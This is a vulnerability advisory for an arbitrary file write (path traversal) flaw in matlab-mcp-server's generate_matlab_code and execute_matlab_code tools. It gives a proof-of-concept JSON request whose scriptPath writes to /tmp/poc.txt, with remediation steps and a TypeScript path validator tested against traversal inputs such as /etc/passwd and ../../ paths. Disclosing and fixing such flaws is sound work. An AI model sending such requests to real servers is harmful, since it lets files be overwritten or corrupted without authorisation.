# Vulnerability Summary: Arbitrary File Write Vulnerability in matlab-mcp-server

## Vulnerability Overview

* **Vulnerability Name**: Arbitrary File Write Vulnerability in matlab-mcp-server #18
* **Vulnerability ID**: CVE ID Request
* **Vulnerability Type**: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
* **Discoverer**: Brucejs
* **Report Date**: April 12, 2026
* **Affected Component**: `src/index.ts`
* **Vulnerability Description**: In the `src/index.ts` file of `matlab-mcp-server`, the `generate_matlab_code` and `execute_matlab_code` tools accept a user-supplied `scriptPath` parameter and use it directly as the target for filesystem writes. The implementation lacks security checks such as validating against a base directory, rejecting absolute paths, or restricting parent directory traversal. An attacker can exploit the MCP interface to write content to arbitrary filesystem paths, leading to loss of integrity, configuration corruption, or further exploitation.

## Impact Scope

* **Affected Versions**: Commit `ab88f606e95f36f725e8628029f7f66d0d9913ca` is confirmed to be affected.
* **Security Impact**:
  * **Confidentiality**: Low (write-only primitive, not read).
  * **Integrity**: High (attackers can write to any writable filesystem location).
  * **Availability**: High (can corrupt application files, configuration files, startup scripts, etc.).
* **CVSS v3.1 Score**: 9.4 (Critical) - Vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`

## Remediation

1. **Eliminate Data Flow**: Eliminate the data flow from request to arbitrary file write as described in the documentation.
2. **Path Resolution and Validation**: Use `path.resolve` to resolve the `scriptPath` and compare it against a trusted base directory using path-aware boundary checks.
3. **Reject Absolute Paths**: Reject absolute paths unless explicitly whitelisted and located within the expected workspace.
4. **Remove Parameter**: If arbitrary output paths are not required, remove the `scriptPath` parameter and generate server-controlled filenames.
5. **Add Regression Tests**: Prove that paths such as `/tmp/poc.txt`, `/etc/passwd`, and `../../outside-workspace.txt` cannot be written via `generate_matlab_code` or `execute_matlab_code`.
6. **Publish Security Advisory**: Release a maintainer security advisory after the patch is published.

## POC Code and Exploitation Examples

### 1. Reproduction Steps Code

```bash
cd matlab-mcp-server
npm install
npm run build
npm run build
npm run start
```

### 2. Reproduction Request (JSON)

```json
{
  "description": "POC_ARBITRARY_FILE_WRITE_TXT",
  "saveScript": true,
  "scriptPath": "/tmp/poc.txt"
}
```

### 3. Verification Result

```bash
cat /tmp/poc.txt
```

### 4. Generated Malicious File Content (`/tmp/poc.txt`)

```matlab
% MATLAB code generated from description: POC_ARBITRARY_FILE_WRITE_TXT
% Generated on: 2026-04-11T17:22:11.773Z

% Your code here:
% This is a placeholder implementation.
% In a real system, this would be generated based on the description.

function result = generatedFunction()
    % Based on description: POC_ARBITRARY_FILE_WRITE_TXT
    disp('Executing function based on description: POC_ARBITRARY_FILE_WRITE_TXT');

    % Placeholder implementation
    result = 'Function executed successfully';
end

% Call the function
generatedFunction()
```
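
### Example: path validation for `scriptPath`

Remediation steps 2, 3 and 5 can be expressed as one validator plus the regression cases. This is an added example, not code from `matlab-mcp-server`; the `WORKSPACE_ROOT` value and the names `resolveScriptPath`, `SAMPLE_PATHS` and `auditSamples` are assumptions, and the sample inputs are constructed around the paths listed in step 5.

```typescript
import * as path from "node:path";

// Hypothetical workspace root; the page does not name one.
const WORKSPACE_ROOT = "/srv/matlab-mcp/workspace";

interface Verdict { ok: boolean; target?: string; reason?: string }

// Decide where a client-supplied scriptPath may be written, or refuse it.
function resolveScriptPath(scriptPath: unknown, baseDir: string = WORKSPACE_ROOT): Verdict {
  if (typeof scriptPath !== "string" || scriptPath.length === 0) {
    return { ok: false, reason: "scriptPath must be a non-empty string" };
  }
  if (scriptPath.indexOf("\0") !== -1) {
    return { ok: false, reason: "NUL byte in scriptPath" };
  }
  if (path.isAbsolute(scriptPath)) {
    return { ok: false, reason: "absolute paths are rejected" };
  }
  const base = path.resolve(baseDir);
  const target = path.resolve(base, scriptPath);
  // Path-aware boundary check: compare components, not string prefixes, so
  // a sibling such as "<base>-evil" is not mistaken for a child of base.
  const rel = path.relative(base, target);
  if (rel === "" || path.isAbsolute(rel) || rel.split(path.sep)[0] === "..") {
    return { ok: false, reason: "resolves outside the workspace" };
  }
  // path.resolve is lexical only: symlinks inside the workspace still need
  // an fs.realpath check on the parent directory before the actual write.
  return { ok: true, target: target };
}

// Constructed inputs: the three paths from the regression-test step, a
// sibling-prefix case, a nested traversal, and two legitimate paths.
const SAMPLE_PATHS: string[] = [
  "/tmp/poc.txt", "/etc/passwd", "../../outside-workspace.txt",
  "../workspace-evil/x.m", "out/../../x.m", "scripts/gen.m", "a/../b.m",
];

// Returns [input, accepted] pairs so a test suite can assert on each case.
function auditSamples(): Array<[string, boolean]> {
  return SAMPLE_PATHS.map((p): [string, boolean] => [p, resolveScriptPath(p).ok]);
}

console.log(auditSamples());
```

The check must run in every handler that writes a file, immediately before the write, and the write must use the returned `target` rather than the original parameter.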